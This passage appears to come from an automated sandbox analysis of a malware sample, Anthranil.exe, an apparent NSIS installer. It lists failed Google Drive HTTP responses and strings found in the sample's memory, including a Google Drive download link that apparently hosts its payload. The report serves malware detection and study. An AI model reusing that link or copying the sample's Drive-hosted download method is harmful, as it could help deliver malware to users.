        04:29:58  AFIdbgRycPxdjWjyfs3Y3imVnVtWE0QqA965Ya9gWByXQywZCJBI0to3FyO8vZqIw2zN2Lsm  86CjWbfPz_SJt_iIsI_2VQ
        04:30:00  AFIdbgTfaRMVSdz2I_gQteKH19D_xvJ5MwjHJD7p7nXwhrRrotKW5Yzz2cNADz6XOz7nde1O  XiBI2Keh8MFdGaBmt9OlbA
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTJn2Lurzj4IBV0yd5RWlijRFGqBXIyYF-wU4Fi3JYtjhdHX7enYZGRNS05WM6MnzBQDJX8ZhIContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:30:03 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'nonce-jEN3criIUTNmSW7MN-8bvg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgR2QAmeHHnKsM1SzUUdkRWxTj6Owy4_t9bfFzuMkuoe92I_zo3QVOCae77XNB2agFfFContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:30:05 GMTContent-Security-Policy: script-src 'nonce-FMuHsHtv33afmVkPvPyEWg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6Iy_Dwv3OzE1-NvGJHrgIpFtOHAhqeGkRprAyrX9rFMxK_EJDQJyXpKxJxFkllbbrs2uDINI4Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:30:07 GMTCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'nonce-yebyOCxsHm-fw_6IbCDaUQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTkcsJonDknn8WKqD6Xw13NFJXQMMMaMddybhhs52LvAol18cfi-EJzIDTQs6Qpa_R3Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:30:09 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-IiGMfMYpvzdZ5uW2MfiawQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTZlFIqQx6lCF-u26JcAzTAF9Rkf_PAgvC82luLTwp2jnX7smWktigueoDKWbuJCEvI1vcIMZMContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:30:12 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-3T_8F_uCxaOzKx65EJOp1Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQor1AMDJBUT27l7U8xZmGPGFtthlOqL_2FHP4CKwhb74vZ0dv2WL4bEvPubnB75BKoE_b911MContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:30:14 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-WTsq79d1HfDmzx-pdQ1a_A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: AM983ebb5F.exe, Anthranil.exe.1.dr
    String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError

Source: Anthranil.exe, 00000006.00000001.2413832004.0000000000649000.00000020.00000001.01000000.00000006.sdmp
    String found in binary or memory: http://www.ftp.ftp://ftp.gopher.

Source: Anthranil.exe, 00000006.00000001.2413832004.00000000005F2000.00000020.00000001.01000000.00000006.sdmp
    String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd

Source: Anthranil.exe, 00000006.00000001.2413832004.00000000005F2000.00000020.00000001.01000000.00000006.sdmp
    String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd

Source: Anthranil.exe, 00000006.00000002.3013439177.0000000005E82000.00000004.00000020.00020000.00000000.sdmp
    String found in binary or memory: https://apis.google.com

Source: Anthranil.exe, 00000006.00000003.2753950907.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp
    String found in binary or memory: https://dhttps://drive.usercontent.google.com/download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=d

Source: Anthranil.exe, 00000006.00000003.3004468843.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2684305199.0000000005EDA000.00000004.00000020.00020000.00000000.sdmp
    String found in binary or memory: https://drive.google.com/

Source: Anthranil.exe, 00000006.00000003.2936308090.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2799683039.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2810739376.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2822415683.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2845242537.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2731145065.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2924930142.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2891797419.0000000005EA4000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2869016490.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2947348025.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2833248733.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2879946897.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000002.3013439177.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2970146989.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2788122541.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2856173350.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2765624883.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2981683074.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2914441562.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2992682795.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2903050718.0000000005EA4000.00000004.00000020.00020000.00000000.sdmp
    String found in binary or memory: https://drive.google.com/%

Source: Anthranil.exe, 00000006.00000003.2936308090.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2799683039.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2810739376.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2822415683.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2845242537.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2924930142.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2891797419.0000000005EA4000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2869016490.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2947348025.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2833248733.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2879946897.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000002.3013439177.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2970146989.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2856173350.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2981683074.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2914441562.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2992682795.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2903050718.0000000005EA4000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2958843876.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.3004468843.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp
    String found in binary or memory: https://drive.google.com/&

Source: Anthranil.exe, 00000006.00000003.2936308090.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2799683039.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2810739376.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2822415683.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2845242537.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2731145065.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2924930142.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2891797419.0000000005EA4000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2869016490.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2947348025.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2833248733.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2879946897.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000002.3013439177.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2719480758.0000000005EE0000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2695758032.0000000005EE0000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2970146989.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2684261462.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2707500476.0000000005EE0000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2788122541.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2856173350.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2765624883.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp
    String found in binary or memory: https://drive.google.com/.

Source: Anthranil.exe, 00000006.00000003.2603833108.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2615437730.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2592673124.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp
    String found in binary or memory: https://drive.google.com/1&0

Source: Anthranil.exe, 00000006.00000003.2672365958.0000000005EE0000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2684261462.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2661358131.0000000005EE0000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2684305199.0000000005EDA000.00000004.00000020.00020000.00000000.sdmp
    String found in binary or memory: https://drive.google.com/:)

Source: Anthranil.exe, 00000006.00000003.2777342764.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp
    String found in binary or memory: https://drive.google.com/crosoft

Source: Anthranil.exe, 00000006.00000003.2799683039.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2810739376.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2822415683.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2603833108.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2845242537.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2672435142.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2731145065.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2718935201.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2649753153.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2695758032.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2638305597.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2891797419.0000000005EA4000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2869016490.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2833248733.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2707422994.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2626671600.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2879946897.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2615437730.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2684261462.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2788122541.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2856173350.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp
    String found in binary or memory: https://drive.google.com/d.google.com

Source: Anthranil.exe, 00000006.00000003.2936308090.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2799683039.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2810739376.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2822415683.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2845242537.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2924930142.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2891797419.0000000005EA4000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2869016490.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2947348025.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2833248733.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2879946897.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000002.3013439177.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2970146989.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2856173350.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2981683074.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2914441562.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2992682795.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2903050718.0000000005EA4000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2958843876.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.3004468843.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp
    String found in binary or memory: https://drive.google.com/ds-cn.com

Source: Anthranil.exe, 00000006.00000003.2936308090.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2799683039.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2810739376.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2822415683.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2845242537.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2672435142.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2731145065.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2718935201.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2924930142.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2649753153.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2695758032.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2638305597.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2891797419.0000000005EA4000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2869016490.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2947348025.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2833248733.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2707422994.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2626671600.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2879946897.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000002.3013439177.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2970146989.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp
    String found in binary or memory: https://drive.google.com/e8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download

Source: Anthranil.exe, 00000006.00000003.2936308090.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2799683039.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2810739376.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2822415683.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2845242537.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2672435142.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2731145065.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2718935201.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2924930142.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2649753153.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2695758032.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2638305597.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2891797419.0000000005EA4000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2869016490.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2947348025.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2833248733.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, 